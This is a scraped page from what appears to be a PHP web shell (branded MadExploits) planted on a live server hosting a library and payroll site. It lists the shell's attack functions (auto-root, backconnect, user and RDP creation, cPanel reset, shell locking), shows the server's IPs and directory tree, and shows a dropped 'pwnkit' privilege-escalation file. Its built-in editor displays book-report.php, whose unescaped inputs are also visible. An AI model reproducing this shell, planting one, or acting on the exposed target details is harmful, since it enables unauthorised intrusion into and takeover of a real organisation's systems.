Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.227.140.134
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
payroll /
libs /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
Barcode Generator
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
datatable
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
add-almirah.php
4.21
KB
-rw-r--r--
add-author.php
4.19
KB
-rw-r--r--
add-book.php
27.85
KB
-rw-r--r--
add-category.php
2.53
KB
-rw-r--r--
add-class.php
4.03
KB
-rw-r--r--
add-currency.php
4.25
KB
-rw-r--r--
add-department.php
4.27
KB
-rw-r--r--
add-language.php
4.25
KB
-rw-r--r--
add-material.php
4.25
KB
-rw-r--r--
add-member-type.php
4.16
KB
-rw-r--r--
add-member.php
21.16
KB
-rw-r--r--
add-publication.php
4.39
KB
-rw-r--r--
add-session.php
4.63
KB
-rw-r--r--
add-shelf.php
4.17
KB
-rw-r--r--
add-source.php
4.21
KB
-rw-r--r--
add-status.php
4.19
KB
-rw-r--r--
add-subject.php
4.09
KB
-rw-r--r--
add-user.php
7.87
KB
-rw-r--r--
add-year.php
3.99
KB
-rw-r--r--
addBookRecord.php
2.25
KB
-rw-r--r--
book-report.php
13.17
KB
-rw-r--r--
change-password.php
3.95
KB
-rw-r--r--
checkMasterValue.php
984
B
-rw-r--r--
dashboard.php
7.4
KB
-rw-r--r--
edit-author.php
2.22
KB
-rw-r--r--
edit-book.php
3.05
KB
-rw-r--r--
edit-category.php
2.81
KB
-rw-r--r--
getBarcode.php
176
B
-rw-r--r--
getBookDetails.php
2.23
KB
-rw-r--r--
getBookRecord.php
3.34
KB
-rw-r--r--
getMemberDetails.php
4.03
KB
-rw-r--r--
get_book.php
826
B
-rw-r--r--
get_student.php
946
B
-rw-r--r--
index.php
2.08
KB
-rw-r--r--
issue-book.php
15.69
KB
-rw-r--r--
issue-report.php
10.43
KB
-rw-r--r--
issued-books-record.php
10.23
KB
-rw-r--r--
logout.php
498
B
-rw-r--r--
manage-almirah.php
5.22
KB
-rw-r--r--
manage-author.php
5.21
KB
-rw-r--r--
manage-books.php
9.87
KB
-rw-r--r--
manage-categories.php
6.69
KB
-rw-r--r--
manage-class.php
5.09
KB
-rw-r--r--
manage-currency.php
5.25
KB
-rw-r--r--
manage-department.php
5.25
KB
-rw-r--r--
manage-issued-books.php
6.43
KB
-rw-r--r--
manage-language.php
5.25
KB
-rw-r--r--
manage-material.php
5.25
KB
-rw-r--r--
manage-member-type.php
5.16
KB
-rw-r--r--
manage-publication.php
5.29
KB
-rw-r--r--
manage-session.php
5.26
KB
-rw-r--r--
manage-shelf.php
5.2
KB
-rw-r--r--
manage-source.php
5.23
KB
-rw-r--r--
manage-status.php
5.21
KB
-rw-r--r--
manage-subject.php
5.24
KB
-rw-r--r--
manage-year.php
5.06
KB
-rw-r--r--
member-report.php
11.48
KB
-rw-r--r--
member-summary.php
9.42
KB
-rw-r--r--
opac.php
17.53
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
reg-students.php
4.6
KB
-rw-r--r--
return-book.php
17.45
KB
-rw-r--r--
return-books-record.php
10.44
KB
-rw-r--r--
returnBook.php
382
B
-rw-r--r--
update-issue-bookdeails.php
5.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : book-report.php
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <meta name="description" content="" /> <meta name="author" content="" /> <title>Online Library Management System</title> <!-- BOOTSTRAP CORE STYLE --> <link href="assets/css/bootstrap.css" rel="stylesheet" /> <!-- FONT AWESOME STYLE --> <link href="assets/css/font-awesome.css" rel="stylesheet" /> <!-- DATATABLE STYLE --> <link href="assets/js/dataTables/dataTables.bootstrap.css" rel="stylesheet" /> <!-- CUSTOM STYLE --> <link href="assets/css/style.css" rel="stylesheet" /> <!-- GOOGLE FONT --> <link href='http://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet' type='text/css' /> </head> <body> <!------MENU SECTION START--> <?php include('includes/header.php'); $session = $db->real_escape($_POST['session']); $subject = $db->real_escape($_POST['subject']); $from_date = date("Y-m-d",strtotime($db->real_escape($_POST['from_date']))); $to_date = date("Y-m-d",strtotime($db->real_escape($_POST['to_date']))); if(!empty($session)){ $where .= " AND session = '$session'"; } if(!empty($subject)){ $where .= " AND subject = '$subject'"; } if(!empty($_POST['from_date']) && !empty($_POST['to_date'])){ $where .= " AND date_of_entry BETWEEN '$from_date' AND '$to_date'"; } ?> <!-- MENU SECTION END--> <div class="content-wrapper"> <div class="container"> <div class="row pad-botm"> <?php if(!empty($msg)){?> <div class="col-md-12"> <div class="alert alert-success" > <strong>Success :</strong> <?php echo htmlentities($msg);?> </div> </div> <?php }elseif(!empty($error)){?> <div class="col-md-12"> <div class="alert alert-danger" > <strong>Error :</strong> <?php echo htmlentities($error);?> </div> </div> <?php }?> </div> <div class="row"> <div class="col-md-12"> <!-- Advanced Tables --> <div class="panel panel-default"> <div class="panel-heading"> Search </div> <div class="panel-body"> <div class="table-responsive"> <form method="post"> <div class="form-group col-md-2 col-sm-4 col-xs-12"> <label>Session<span style="color:red;">*</span></label> <div> <select class="form-control" type="text" name="session" id="session"/> <option value="">Select</option> <?php $getSession = $db->query("SELECT * FROM session ORDER BY session_id ASC"); while($getSessionRes = $db->fetch_array($getSession)){?> <option value="<?php echo $getSessionRes['session_id']?>" <?php if($getSessionRes['session_id'] == $_POST['session']){echo "selected";}?>><?php echo $getSessionRes['session']?></option> <?php }?> </select> </div> </div> <div class="form-group col-md-2 col-sm-4 col-xs-12"> <label>From Date<span style="color:red;">*</span></label> <div> <input class="form-control" type="text" name="from_date" id="from_date" value="<?php echo $_POST['from_date']?>"/> </div> </div> <div class="form-group col-md-2 col-sm-4 col-xs-12"> <label>To Date<span style="color:red;">*</span></label> <div> <input class="form-control" type="text" name="to_date" id="to_date" value="<?php echo $_POST['to_date']?>"/> </div> </div> <div class="form-group col-md-3 col-sm-6 col-xs-12"> <label>Subject<span style="color:red;">*</span></label> <div> <select class="form-control" type="text" name="subject" id="subject"/> <option value="">Select</option> <?php $getSession = $db->query("SELECT * FROM subject ORDER BY subject_id ASC"); while($getSessionRes = $db->fetch_array($getSession)){?> <option value="<?php echo $getSessionRes['subject_id']?>" <?php if($getSessionRes['subject_id'] == $_POST['subject']){echo "selected";}?>><?php echo $getSessionRes['subject']?></option> <?php }?> </select> </div> </div> <div class="form-group col-md-2 col-sm-4 col-xs-12"> <label> <span style="color:red;"></span></label> <div> <input class="form-control btn-info" type="submit" name="search" id="subject" value="Search"/> </div> </div> <div class="clearfix advance"></div> </form> </div> </div> </div> <!-- Advanced Tables --> <div class="panel panel-default"> <div class="panel-heading"> Author Listing </div> <div class="panel-body"> <div class="table-responsive"> <table class="table table-striped table-bordered table-hover" id="dataTables-example"> <thead> <tr> <th>#</th> <th>Acc. No.</th> <th>Book Title</th> <th>Author</th> <th>Publication</th> <th>Subject</th> <th>Call No.</th> <th>Almirah No.</th> <th>Shelf No.</th> <th>Status</th> <th>Language</th> </tr> </thead> <tbody id="myTable"> <?php $record = $db->query("SELECT * FROM book_record WHERE 1 $where ORDER BY acc_no ASC"); $count = $db->num_rows($record); while($result = $db->fetch_array($record)){ $getSubject = $db->fetch_array($db->query("SELECT subject FROM subject WHERE subject_id = '".$result['subject']."'")); $getLanguage = $db->fetch_array($db->query("SELECT language FROM language WHERE language_id = '".$result['language']."'")); $getStatus = $db->fetch_array($db->query("SELECT status FROM status WHERE status_id = '".$result['status']."'")); ?> <tr class="odd gradeX"> <td class="center"><?php echo htmlentities($count--);?></td> <td class="center"><?php echo htmlentities($result['acc_no']);?></td> <td class="center"><?php echo htmlentities($result['book_title']);?></td> <td class="center"><?php echo htmlentities($result['author']);?></td> <td class="center"><?php echo htmlentities($result['publication']);?></td> <td class="center"><?php echo htmlentities($getSubject['subject']);?></td> <td class="center"><?php echo htmlentities($result['call_no']);?></td> <td class="center"><?php echo htmlentities($result['almirah_no']);?></td> <td class="center"><?php echo htmlentities($result['shelf_no']);?></td> <td class="center"><?php echo htmlentities($getStatus['status']);?></td> <td class="center"><?php echo htmlentities($getLanguage['language']);?></td> </tr> <?php }?> </tbody> </table> </div> </div> </div> <!--End Advanced Tables --> </div> </div> </div> </div> <!-- CONTENT-WRAPPER SECTION END--> <?php include('includes/footer.php');?> <!-- FOOTER SECTION END--> <!-- JAVASCRIPT FILES PLACED AT THE BOTTOM TO REDUCE THE LOADING TIME --> <!-- CORE JQUERY --> <script src="assets/js/jquery-1.10.2.js"></script> <!-- BOOTSTRAP SCRIPTS --> <script src="assets/js/bootstrap.js"></script> <!-- DATATABLE SCRIPTS --> <script src="assets/js/dataTables/jquery.dataTables.js"></script> <script src="assets/js/dataTables/dataTables.bootstrap.js"></script> <!-- CUSTOM SCRIPTS --> <script src="assets/js/custom.js"></script> <script> $(function(){ $(".advance").css("display","none"); $("#advance_search").click(function(){ if($("#advance_search").is(":checked")){ $(".advance").css("display","block"); $(".search_by").css("display","none"); }else{ $(".advance").css("display","none"); $(".search_by").css("display","block"); } }); /* $("#search_by_value").click(function(){ var search_by = $("#search_by").val(); var search_value = $("#search_by").val(); $.ajax({ type:"POST", url:"getBookRecord.php", data:{search_by:search_by,search_value:search_value,advance_search:""}, datatype:"html", success:function(res){ $("#myTable").append(""); $("#myTable").append(res); } }); $.getScript( "assets/js/dataTables/jquery.dataTables.js" ); $.getScript( "assets/js/dataTables/dataTables.bootstrap.js" ); }); $("#search_by_advance").click(function(){ var book_title = $("#book_title").val(); var subject = $("#subject").val(); var author = $("#author").val(); var publication = $("#publication").val(); var source = $("#source").val(); var issbn_no = $("#issbn_no").val(); var issn = $("#issn").val(); var acc_no = $("#acc_no").val(); $.ajax({ type:"POST", url:"getBookRecord.php", data:{book_title:book_title,subject:subject,author:author,publication:publication,source:source,issbn_no:issbn_no,issn:issn,acc_no:acc_no,advance_search:"1"}, datatype:"html", success:function(res){ $("#myTable").append(""); $("#myTable").append(res); } }); $.getScript( "assets/js/dataTables/jquery.dataTables.js" ); $.getScript( "assets/js/dataTables/dataTables.bootstrap.js" ); }); */ }); </script> </body> </html>
Close